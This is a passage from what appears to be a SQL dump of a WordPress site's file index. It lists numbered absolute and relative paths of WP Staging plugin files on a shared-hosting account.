ontent/plugins/wp-staging/Backend/views/settings/tabs/mail-settings.php','wp-content/plugins/wp-staging/Backend/views/settings/tabs/mail-settings.php'),(13397,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backend/views/settings/tabs/remote-storages.php','wp-content/plugins/wp-staging/Backend/views/settings/tabs/remote-storages.php'),(13398,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backend/views/settings/tabs/storages/amazons3-settings.php','wp-content/plugins/wp-staging/Backend/views/settings/tabs/storages/amazons3-settings.php'),(13399,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backend/views/settings/tabs/storages/base-s3-settings.php','wp-content/plugins/wp-staging/Backend/views/settings/tabs/storages/base-s3-settings.php'),(13400,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backend/views/settings/tabs/storages/digitalocean-spaces-settings.php','wp-content/plugins/wp-staging/Backend/views/settings/tabs/storages/digitalocean-spaces-settings.php'),(13401,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backend/views/settings/tabs/storages/dropbox-settings.php','wp-content/plugins/wp-staging/Backend/views/settings/tabs/storages/dropbox-settings.php'),(13402,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backend/views/settings/tabs/storages/encrypted-notice.php','wp-content/plugins/wp-staging/Backend/views/settings/tabs/storages/encrypted-notice.php'),(13403,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backend/views/settings/tabs/storages/generic-s3-settings.php','wp-content/plugins/wp-staging/Backend/views/settings/tabs/storages/generic-s3-settings.php'),(13404,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backend/views/settings/tabs/storages/googledrive-settings.php','wp-content/plugins/wp-staging/Backend/views/settings/tabs/storages/googledrive-settings.php'),(13405,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backend/views/settings/tabs/storages/last-saved-notice.php','wp-content/plugins/wp-staging/Backend/views/settings/tabs/storages/last-saved-notice.php'),(13406,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backend/views/settings/tabs/storages/sftp-settings.php','wp-content/plugins/wp-staging/Backend/views/settings/tabs/storages/sftp-settings.php'),(13407,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backend/views/settings/tabs/storages/wasabi-s3-settings.php','wp-content/plugins/wp-staging/Backend/views/settings/tabs/storages/wasabi-s3-settings.php'),(13408,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backend/views/templates/exclude-filters/dir-name-exclude-filter.php','wp-content/plugins/wp-staging/Backend/views/templates/exclude-filters/dir-name-exclude-filter.php'),(13409,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backend/views/templates/exclude-filters/file-ext-exclude-filter.php','wp-content/plugins/wp-staging/Backend/views/templates/exclude-filters/file-ext-exclude-filter.php'),(13410,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backend/views/templates/exclude-filters/file-name-exclude-filter.php','wp-content/plugins/wp-staging/Backend/views/templates/exclude-filters/file-name-exclude-filter.php'),(13411,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backend/views/templates/exclude-filters/file-size-exclude-filter.php','wp-content/plugins/wp-staging/Backend/views/templates/exclude-filters/file-size-exclude-filter.php'),(13412,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backend/views/tools/index.php','wp-content/plugins/wp-staging/Backend/views/tools/index.php'),(13413,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backend/views/tools/tabs/system-info.php','wp-content/plugins/wp-staging/Backend/views/tools/tabs/system-info.php'),(13414,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backend/views/welcome/welcome.php','wp-content/plugins/wp-staging/Backend/views/welcome/welcome.php'),(13415,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/AfterRestore.php','wp-content/plugins/wp-staging/Backup/AfterRestore.php'),(13416,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Ajax/Backup/PrepareBackup.php','wp-content/plugins/wp-staging/Backup/Ajax/Backup/PrepareBackup.php'),(13417,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Ajax/Backup.php','wp-content/plugins/wp-staging/Backup/Ajax/Backup.php'),(13418,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Ajax/Cancel.php','wp-content/plugins/wp-staging/Backup/Ajax/Cancel.php'),(13419,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Ajax/Delete.php','wp-content/plugins/wp-staging/Backup/Ajax/Delete.php'),(13420,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Ajax/Edit.php','wp-content/plugins/wp-staging/Backup/Ajax/Edit.php'),(13421,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Ajax/FileInfo.php','wp-content/plugins/wp-staging/Backup/Ajax/FileInfo.php'),(13422,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Ajax/FileList/ListableBackupsCollection.php','wp-content/plugins/wp-staging/Backup/Ajax/FileList/ListableBackupsCollection.php'),(13423,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Ajax/FileList.php','wp-content/plugins/wp-staging/Backup/Ajax/FileList.php'),(13424,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Ajax/Listing.php','wp-content/plugins/wp-staging/Backup/Ajax/Listing.php'),(13425,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Ajax/MemoryExhaust.php','wp-content/plugins/wp-staging/Backup/Ajax/MemoryExhaust.php'),(13426,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Ajax/Parts.php','wp-content/plugins/wp-staging/Backup/Ajax/Parts.php'),(13427,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Ajax/PrepareJob.php','wp-content/plugins/wp-staging/Backup/Ajax/PrepareJob.php'),(13428,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Ajax/Restore/LoginUrl.php','wp-content/plugins/wp-staging/Backup/Ajax/Restore/LoginUrl.php'),(13429,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Ajax/Restore/PrepareRestore.php','wp-content/plugins/wp-staging/Backup/Ajax/Restore/PrepareRestore.php'),(13430,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Ajax/Restore/ReadBackupMetadata.php','wp-content/plugins/wp-staging/Backup/Ajax/Restore/ReadBackupMetadata.php'),(13431,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Ajax/Restore.php','wp-content/plugins/wp-staging/Backup/Ajax/Restore.php'),(13432,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Ajax/ScheduleList.php','wp-content/plugins/wp-staging/Backup/Ajax/ScheduleList.php'),(13433,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Ajax/Status.php','wp-content/plugins/wp-staging/Backup/Ajax/Status.php'),(13434,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Ajax/Upload.php','wp-content/plugins/wp-staging/Backup/Ajax/Upload.php'),(13435,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/BackgroundProcessing/Backup/PrepareBackup.php','wp-content/plugins/wp-staging/Backup/BackgroundProcessing/Backup/PrepareBackup.php'),(13436,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/BackupDeleter.php','wp-content/plugins/wp-staging/Backup/BackupDeleter.php'),(13437,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/BackupDownload.php','wp-content/plugins/wp-staging/Backup/BackupDownload.php'),(13438,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/BackupProcessLock.php','wp-content/plugins/wp-staging/Backup/BackupProcessLock.php'),(13439,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/BackupRepairer.php','wp-content/plugins/wp-staging/Backup/BackupRepairer.php'),(13440,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/BackupScheduler.php','wp-content/plugins/wp-staging/Backup/BackupScheduler.php'),(13441,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/BackupServiceProvider.php','wp-content/plugins/wp-staging/Backup/BackupServiceProvider.php'),(13442,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/BackupValidator.php','wp-content/plugins/wp-staging/Backup/BackupValidator.php'),(13443,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Dto/AbstractDto.php','wp-content/plugins/wp-staging/Backup/Dto/AbstractDto.php'),(13444,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Dto/AbstractTaskDto.php','wp-content/plugins/wp-staging/Backup/Dto/AbstractTaskDto.php'),(13445,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Dto/Job/JobBackupDataDto.php','wp-content/plugins/wp-staging/Backup/Dto/Job/JobBackupDataDto.php'),(13446,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Dto/Job/JobRestoreDataDto.php','wp-content/plugins/wp-staging/Backup/Dto/Job/JobRestoreDataDto.php'),(13447,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Dto/JobDataDto.php','wp-content/plugins/wp-staging/Backup/Dto/JobDataDto.php'),(13448,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Dto/Service/CompressorDto.php','wp-content/plugins/wp-staging/Backup/Dto/Service/CompressorDto.php'),(13449,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Dto/StepsDto.php','wp-content/plugins/wp-staging/Backup/Dto/StepsDto.php'),(13450,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Dto/Task/Backup/Response/FinalizeBackupResponseDto.php','wp-content/plugins/wp-staging/Backup/Dto/Task/Backup/Response/FinalizeBackupResponseDto.php'),(13451,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Dto/Task/Restore/RenameDatabaseTaskDto.php','wp-content/plugins/wp-staging/Backup/Dto/Task/Restore/RenameDatabaseTaskDto.php'),(13452,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Dto/TaskResponseDto.php','wp-content/plugins/wp-staging/Backup/Dto/TaskResponseDto.php'),(13453,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Dto/Traits/DateCreatedTrait.php','wp-content/plugins/wp-staging/Backup/Dto/Traits/DateCreatedTrait.php'),(13454,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Dto/Traits/IsExportingTrait.php','wp-content/plugins/wp-staging/Backup/Dto/Traits/IsExportingTrait.php'),(13455,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Dto/Traits/WithPluginsThemesMuPluginsTrait.php','wp-content/plugins/wp-staging/Backup/Dto/Traits/WithPluginsThemesMuPluginsTrait.php'),(13456,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Entity/BackupMetadata.php','wp-content/plugins/wp-staging/Backup/Entity/BackupMetadata.php'),(13457,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Entity/FileBeingExtracted.php','wp-content/plugins/wp-staging/Backup/Entity/FileBeingExtracted.php'),(13458,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Entity/ListableBackup.php','wp-content/plugins/wp-staging/Backup/Entity/ListableBackup.php'),(13459,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Entity/MultipartMetadata.php','wp-content/plugins/wp-staging/Backup/Entity/MultipartMetadata.php'),(13460,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Exceptions/BackupRuntimeException.php','wp-content/plugins/wp-staging/Backup/Exceptions/BackupRuntimeException.php'),(13461,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Exceptions/DiskNotWritableException.php','wp-content/plugins/wp-staging/Backup/Exceptions/DiskNotWritableException.php'),(13462,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Exceptions/ProcessLockedException.php','wp-content/plugins/wp-staging/Backup/Exceptions/ProcessLockedException.php'),(13463,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Exceptions/StorageException.php','wp-content/plugins/wp-staging/Backup/Exceptions/StorageException.php'),(13464,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Exceptions/TaskHealthException.php','wp-content/plugins/wp-staging/Backup/Exceptions/TaskHealthException.php'),(13465,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Exceptions/ThresholdException.php','wp-content/plugins/wp-staging/Backup/Exceptions/ThresholdException.php'),(13466,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Job/AbstractJob.php','wp-content/plugins/wp-staging/Backup/Job/AbstractJob.php'),(13467,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Job/JobBackupProvider.php','wp-content/plugins/wp-staging/Backup/Job/JobBackupProvider.php'),(13468,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Job/JobProvider.php','wp-content/plugins/wp-staging/Backup/Job/JobProvider.php'),(13469,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Job/JobRestoreProvider.php','wp-content/plugins/wp-staging/Backup/Job/JobRestoreProvider.php'),(13470,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Job/Jobs/JobBackup.php','wp-content/plugins/wp-staging/Backup/Job/Jobs/JobBackup.php'),(13471,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Job/Jobs/JobCancel.php','wp-content/plugins/wp-staging/Backup/Job/Jobs/JobCancel.php'),(13472,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Job/Jobs/JobRestore.php','wp-content/plugins/wp-staging/Backup/Job/Jobs/JobRestore.php'),(13473,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Request/Logs.php','wp-content/plugins/wp-staging/Backup/Request/Logs.php'),(13474,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Service/BackupAssets.php','wp-content/plugins/wp-staging/Backup/Service/BackupAssets.php'),(13475,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Service/BackupMetadataEditor.php','wp-content/plugins/wp-staging/Backup/Service/BackupMetadataEditor.php'),(13476,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Service/BackupsFinder.php','wp-content/plugins/wp-staging/Backup/Service/BackupsFinder.php'),(13477,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Service/Compressor.php','wp-content/plugins/wp-staging/Backup/Service/Compressor.php'),(13478,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Service/Database/DatabaseImporter.php','wp-content/plugins/wp-staging/Backup/Service/Database/DatabaseImporter.php'),(13479,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Service/Database/Exporter/AbstractExporter.php','wp-content/plugins/wp-staging/Backup/Service/Database/Exporter/AbstractExporter.php'),(13480,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Service/Database/Exporter/DDLExporter.php','wp-content/plugins/wp-staging/Backup/Service/Database/Exporter/DDLExporter.php'),(13481,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Service/Database/Exporter/RowsExporter.php','wp-content/plugins/wp-staging/Backup/Service/Database/Exporter/RowsExporter.php'),(13482,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Service/Database/Exporter/ViewDDLOrder.php','wp-content/plugins/wp-staging/Backup/Service/Database/Exporter/ViewDDLOrder.php'),(13483,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Service/Database/Importer/BasicDatabaseSearchReplacer.php','wp-content/plugins/wp-staging/Backup/Service/Database/Importer/BasicDatabaseSearchReplacer.php'),(13484,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Service/Database/Importer/DatabaseSearchReplacerInterface.php','wp-content/plugins/wp-staging/Backup/Service/Database/Importer/DatabaseSearchReplacerInterface.php'),(13485,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Service/Database/Importer/Insert/ExtendedInserter.php','wp-content/plugins/wp-staging/Backup/Service/Database/Importer/Insert/ExtendedInserter.php'),(13486,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Service/Database/Importer/Insert/ExtendedInserterWithoutTransaction.php','wp-content/plugins/wp-staging/Backup/Service/Database/Importer/Insert/ExtendedInserterWithoutTransaction.php'),(13487,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Service/Database/Importer/Insert/QueryInserter.php','wp-content/plugins/wp-staging/Backup/Service/Database/Importer/Insert/QueryInserter.php'),(13488,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Service/Database/Importer/Insert/SingleInserter.php','wp-content/plugins/wp-staging/Backup/Service/Database/Importer/Insert/SingleInserter.php'),(13489,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Service/Database/Importer/Insert/TransactionInserter.php','wp-content/plugins/wp-staging/Backup/Service/Database/Importer/Insert/TransactionInserter.php'),(13490,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Service/Database/Importer/QueryCompatibility.php','wp-content/plugins/wp-staging/Backup/Service/Database/Importer/QueryCompatibility.php'),(13491,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Service/Database/Importer/TableViewsRenamer.php','wp-content/plugins/wp-staging/Backup/Service/Database/Importer/TableViewsRenamer.php'),(13492,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Service/Extractor.php','wp-content/plugins/wp-staging/Backup/Service/Extractor.php'),(13493,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Service/Multipart/MultipartInjection.php','wp-content/plugins/wp-staging/Backup/Service/Multipart/MultipartInjection.php'),(13494,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Service/Multipart/MultipartRestoreInterface.php','wp-content/plugins/wp-staging/Backup/Service/Multipart/MultipartRestoreInterface.php'),(13495,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Service/Multipart/MultipartRestorer.php','wp-content/plugins/wp-staging/Backup/Service/Multipart/MultipartRestorer.php'),(13496,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Service/Multipart/MultipartSplitInterface.php','wp-content/plugins/wp-staging/Backup/Service/Multipart/MultipartSplitInterface.php'),(13497,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Service/Multipart/MultipartSplitter.php','wp-content/plugins/wp-staging/Backup/Service/Multipart/MultipartSplitter.php'),(13498,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Storage/Providers.php','wp-content/plugins/wp-staging/Backup/Storage/Providers.php'),(13499,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/AbstractTask.php','wp-content/plugins/wp-staging/Backup/Task/AbstractTask.php'),(13500,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/BackupTask.php','wp-content/plugins/wp-staging/Backup/Task/BackupTask.php'),(13501,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/FileBackupTask.php','wp-content/plugins/wp-staging/Backup/Task/FileBackupTask.php'),(13502,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/FileRestoreTask.php','wp-content/plugins/wp-staging/Backup/Task/FileRestoreTask.php'),(13503,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/RestoreFileHandlers/DeleteHandler.php','wp-content/plugins/wp-staging/Backup/Task/RestoreFileHandlers/DeleteHandler.php'),(13504,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/RestoreFileHandlers/MoveHandler.php','wp-content/plugins/wp-staging/Backup/Task/RestoreFileHandlers/MoveHandler.php'),(13505,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/RestoreFileHandlers/RestoreFileHandler.php','wp-content/plugins/wp-staging/Backup/Task/RestoreFileHandlers/RestoreFileHandler.php'),(13506,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/RestoreFileHandlers/RestoreFileProcessor.php','wp-content/plugins/wp-staging/Backup/Task/RestoreFileHandlers/RestoreFileProcessor.php'),(13507,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/RestoreTask.php','wp-content/plugins/wp-staging/Backup/Task/RestoreTask.php'),(13508,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/Tasks/CleanupBakTablesTask.php','wp-content/plugins/wp-staging/Backup/Task/Tasks/CleanupBakTablesTask.php'),(13509,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/Tasks/CleanupTmpFilesTask.php','wp-content/plugins/wp-staging/Backup/Task/Tasks/CleanupTmpFilesTask.php'),(13510,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/Tasks/CleanupTmpTablesTask.php','wp-content/plugins/wp-staging/Backup/Task/Tasks/CleanupTmpTablesTask.php'),(13511,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/Tasks/JobBackup/BackupMuPluginsTask.php','wp-content/plugins/wp-staging/Backup/Task/Tasks/JobBackup/BackupMuPluginsTask.php'),(13512,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/Tasks/JobBackup/BackupOtherFilesTask.php','wp-content/plugins/wp-staging/Backup/Task/Tasks/JobBackup/BackupOtherFilesTask.php'),(13513,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/Tasks/JobBackup/BackupPluginsTask.php','wp-content/plugins/wp-staging/Backup/Task/Tasks/JobBackup/BackupPluginsTask.php'),(13514,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/Tasks/JobBackup/BackupRequirementsCheckTask.php','wp-content/plugins/wp-staging/Backup/Task/Tasks/JobBackup/BackupRequirementsCheckTask.php'),(13515,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/Tasks/JobBackup/BackupThemesTask.php','wp-content/plugins/wp-staging/Backup/Task/Tasks/JobBackup/BackupThemesTask.php'),(13516,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/Tasks/JobBackup/BackupUploadsTask.php','wp-content/plugins/wp-staging/Backup/Task/Tasks/JobBackup/BackupUploadsTask.php'),(13517,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/Tasks/JobBackup/DatabaseBackupTask.php','wp-content/plugins/wp-staging/Backup/Task/Tasks/JobBackup/DatabaseBackupTask.php'),(13518,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/Tasks/JobBackup/FilesystemScannerTask.php','wp-content/plugins/wp-staging/Backup/Task/Tasks/JobBackup/FilesystemScannerTask.php'),(13519,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/Tasks/JobBackup/FinalizeBackupTask.php','wp-content/plugins/wp-staging/Backup/Task/Tasks/JobBackup/FinalizeBackupTask.php'),(13520,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/Tasks/JobBackup/FinishBackupTask.php','wp-content/plugins/wp-staging/Backup/Task/Tasks/JobBackup/FinishBackupTask.php'),(13521,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/Tasks/JobBackup/IncludeDatabaseTask.php','wp-content/plugins/wp-staging/Backup/Task/Tasks/JobBackup/IncludeDatabaseTask.php'),(13522,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/Tasks/JobBackup/ScheduleBackupTask.php','wp-content/plugins/wp-staging/Backup/Task/Tasks/JobBackup/ScheduleBackupTask.php'),(13523,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/Tasks/JobBackup/ValidateBackupTask.php','wp-content/plugins/wp-staging/Backup/Task/Tasks/JobBackup/ValidateBackupTask.php'),(13524,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/Tasks/JobRestore/CleanExistingMediaTask.php','wp-content/plugins/wp-staging/Backup/Task/Tasks/JobRestore/CleanExistingMediaTask.php'),(13525,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/Tasks/JobRestore/ExtractFilesTask.php','wp-content/plugins/wp-staging/Backup/Task/Tasks/JobRestore/ExtractFilesTask.php'),(13526,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/Tasks/JobRestore/RenameDatabaseTask.php','wp-content/plugins/wp-staging/Backup/Task/Tasks/JobRestore/RenameDatabaseTask.php'),(13527,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/Tasks/JobRestore/RestoreDatabaseTask.php','wp-content/plugins/wp-staging/Backup/Task/Tasks/JobRestore/RestoreDatabaseTask.php'),(13528,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/Tasks/JobRestore/RestoreFinishTask.php','wp-content/plugins/wp-staging/Backup/Task/Tasks/JobRestore/RestoreFinishTask.php'),(13529,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/Tasks/JobRestore/RestoreLanguageFilesTask.php','wp-content/plugins/wp-staging/Backup/Task/Tasks/JobRestore/RestoreLanguageFilesTask.php'),(13530,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/Tasks/JobRestore/RestoreMuPluginsTask.php','wp-content/plugins/wp-staging/Backup/Task/Tasks/JobRestore/RestoreMuPluginsTask.php'),(13531,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/Tasks/JobRestore/RestoreOtherFilesInWpContentTask.php','wp-content/plugins/wp-staging/Backup/Task/Tasks/JobRestore/RestoreOtherFilesInWpContentTask.php'),(13532,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/Tasks/JobRestore/RestorePluginsTask.php','wp-content/plugins/wp-staging/Backup/Task/Tasks/JobRestore/RestorePluginsTask.php'),(13533,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/Tasks/JobRestore/RestoreRequirementsCheckTask.php','wp-content/plugins/wp-staging/Backup/Task/Tasks/JobRestore/RestoreRequirementsCheckTask.php'),(13534,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/Tasks/JobRestore/RestoreThemesTask.php','wp-content/plugins/wp-staging/Backup/Task/Tasks/JobRestore/RestoreThemesTask.php'),(13535,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/Tasks/JobRestore/StartRestoreTask.php','wp-content/plugins/wp-staging/Backup/Task/Tasks/JobRestore/StartRestoreTask.php'),(13536,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/Task/Tasks/JobRestore/UpdateBackupsScheduleTask.php','wp-content/plugins/wp-staging/Backup/Task/Tasks/JobRestore/UpdateBackupsScheduleTask.php'),(13537,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/WithBackupIdentifier.php','wp-content/plugins/wp-staging/Backup/WithBackupIdentifier.php'),(13538,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Backup/wpstgBackupHeader.txt','wp-content/plugins/wp-staging/Backup/wpstgBackupHeader.txt'),(13539,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Basic/Ajax/ProCronsCleaner.php','wp-content/plugins/wp-staging/Basic/Ajax/ProCronsCleaner.php'),(13540,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Basic/Backup/BackupServiceProvider.php','wp-content/plugins/wp-staging/Basic/Backup/BackupServiceProvider.php'),(13541,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Basic/BasicServiceProvider.php','wp-content/plugins/wp-staging/Basic/BasicServiceProvider.php'),(13542,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Basic/Notices/BasicNotices.php','wp-content/plugins/wp-staging/Basic/Notices/BasicNotices.php'),(13543,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Basic/Notices/RatingNotice.php','wp-content/plugins/wp-staging/Basic/Notices/RatingNotice.php'),(13544,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Core/CoreServiceProvider.php','wp-content/plugins/wp-staging/Core/CoreServiceProvider.php'),(13545,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Core/Cron/Cron.php','wp-content/plugins/wp-staging/Core/Cron/Cron.php'),(13546,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Core/DTO/Settings.php','wp-content/plugins/wp-staging/Core/DTO/Settings.php'),(13547,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Core/Forms/Elements/Check.php','wp-content/plugins/wp-staging/Core/Forms/Elements/Check.php'),(13548,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Core/Forms/Elements/Color.php','wp-content/plugins/wp-staging/Core/Forms/Elements/Color.php'),(13549,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Core/Forms/Elements/Date.php','wp-content/plugins/wp-staging/Core/Forms/Elements/Date.php'),(13550,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Core/Forms/Elements/DateTime.php','wp-content/plugins/wp-staging/Core/Forms/Elements/DateTime.php'),(13551,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Core/Forms/Elements/Email.php','wp-content/plugins/wp-staging/Core/Forms/Elements/Email.php'),(13552,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Core/Forms/Elements/File.php','wp-content/plugins/wp-staging/Core/Forms/Elements/File.php'),(13553,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Core/Forms/Elements/Hidden.php','wp-content/plugins/wp-staging/Core/Forms/Elements/Hidden.php'),(13554,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Core/Forms/Elements/Interfaces/InterfaceElement.php','wp-content/plugins/wp-staging/Core/Forms/Elements/Interfaces/InterfaceElement.php'),(13555,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Core/Forms/Elements/Interfaces/InterfaceElementWithOptions.php','wp-content/plugins/wp-staging/Core/Forms/Elements/Interfaces/InterfaceElementWithOptions.php'),(13556,'/home/eckank5/public_html/wp-content/plugins/wp-staging/Core/Forms/Elements/Numerical.php','wp-content/plugins/wp-staging/Core/Form